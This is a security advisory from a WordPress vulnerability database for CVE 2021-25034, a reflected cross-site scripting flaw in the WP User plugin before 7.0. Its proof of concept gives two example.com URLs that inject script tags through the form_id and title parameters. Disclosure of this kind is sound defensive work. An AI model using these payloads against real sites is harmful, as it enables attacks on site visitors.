WP User < 7.0 – Reflected Cross-Site Scripting | CVE 2021-25034 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape some parameters in pages where the [wp_user] shortcode is used, leading to Reflected Cross-Site Scripting issues

Proof of Concept

PAGE_WITH_SHORTCODE is a page with the [wp_user] shortcode embed

https://example.com/?page_id={PAGE_WITH_SHORTCODE}&form_id="><script>alert(/XSS/)</script>
https://example.com//?page_id={PAGE_WITH_SHORTCODE}&form_id=1&title=<script>alert(2)</script>

Affects Plugins

Fixed in 7.0

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Jeremie Amsellem

Submitter

Jeremie Amsellem

Submitter website

https://fenrir.pro

Submitter twitter

Verified

Yes

WPVDB ID

c4e50dd2-450f-413d-b15f-ece413e42157

Timeline

Publicly Published

2022-01-31 (about 2 years ago)

Added

2022-01-31 (about 2 years ago)

Last Updated

2022-04-12 (about 2 years ago)

Other

Published

Title

Published

2022-06-27

Title

Simple Page Transition <= 1.4.1 - Admin+ Stored Cross-Site Scripting

Published

2022-08-23

Title

All-in-One WP Migration < 7.63 - Unauthenticated Reflected XSS

Published

2024-04-16

Title

WP Stripe Checkout < 1.2.2.42 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode

Published

2021-08-24

Title

TextME SMS < 1.8.9 - Authenticated Stored XSS

Published

2021-12-06

Title

PowerPack Addons for Elementor < 2.6.2 - Reflected Cross-Site Scripting